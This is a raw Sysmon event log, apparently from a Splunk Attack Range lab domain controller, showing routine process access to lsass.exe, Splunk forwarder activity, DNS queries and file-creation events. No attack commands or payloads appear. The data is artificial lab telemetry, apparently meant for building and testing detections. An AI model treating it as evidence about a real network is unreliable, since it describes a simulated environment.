12:01:14.799{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:14.799{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.799{266CAFBE-646A-6064-0B00-00000000AE01}8561016C:\Windows\system32\lsass.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x80000000000000003052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.658{266CAFBE-648A-6064-7900-00000000AE01}46204624C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.486{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-648A-6064-7900-00000000AE01}4620C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:14.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:14.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:14.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:14.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.486{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:14.471{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003041Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.471{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-648A-6064-7900-00000000AE01}4620C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003040Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.471{266CAFBE-647D-6064-2F00-00000000AE01}27964104C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-648A-6064-7900-00000000AE01}4620C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003039Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.253{266CAFBE-648A-6064-7900-00000000AE01}4620C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000003038Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:12.496{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local56610- 22542200x80000000000000003078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:14.440{266CAFBE-646A-6064-0B00-00000000AE01}856_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.ATTACKRANGE.LOCAL.1460-C:\Windows\System32\lsass.exe 
22542200x80000000000000003077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.862{266CAFBE-646C-6064-1200-00000000AE01}1196wpad1460-C:\Windows\System32\svchost.exe 23542300x80000000000000003076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.752{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C2AB49A22A48E50498E27B757A7B9A70,SHA256=F4A63B50B6252CF38A90854BEC388541AF4C4AE969998DED3CC0CF092F4ED456,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.565{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=D7AB20240FB3E613E3144AAC7472374A,SHA256=492244C49E7BC8680D0F88380236583F4EA2C26EE4AD63AF3C1EE2F353353D05,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000003074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:13.543{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63663- 23542300x80000000000000003073Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.533{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\DFS ReplicationMD5=A0D1347F5197F07FD38C7C9ADC5ADAC3,SHA256=6826E84FA24EA127E5D966920462D5D892887FEC0322982BB7B04A7289E5D8C1,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000003072Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.533{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Directory ServiceMD5=30DE71D3653ED5ED674EBDC03C76CAAC,SHA256=EA461579E702FA7DA4D3C81D6EC2351A069C75B6C11A262BDF169A0B5B8BA1C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003071Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.533{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\DNS ServerMD5=1F3246F51ECE303275685B0EBB5AC25D,SHA256=6280AF9F133AF58374EA0A9B7927A66E022FA29359E7E57D84605159E44A8682,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000003070Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.502{266CAFBE-648B-6064-7A00-00000000AE01}46924696C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe{266CAFBE-647D-6064-2F00-00000000AE01}2796C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+577205|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+576d36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+56c09|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+572d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+8fe2c4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003069Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:15.346{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-648B-6064-7A00-00000000AE01}4692C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003068Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.346{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003067Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:15.346{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003066Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:15.346{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
